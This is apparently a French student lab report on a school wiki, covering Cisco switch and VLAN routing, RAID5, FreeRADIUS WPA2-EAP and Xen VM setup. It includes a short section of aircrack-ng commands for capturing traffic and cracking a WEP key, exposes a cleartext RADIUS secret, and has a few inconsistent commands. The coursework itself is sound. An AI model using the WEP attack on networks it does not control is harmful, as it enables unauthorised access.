 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== 3 Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== 3.1 L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
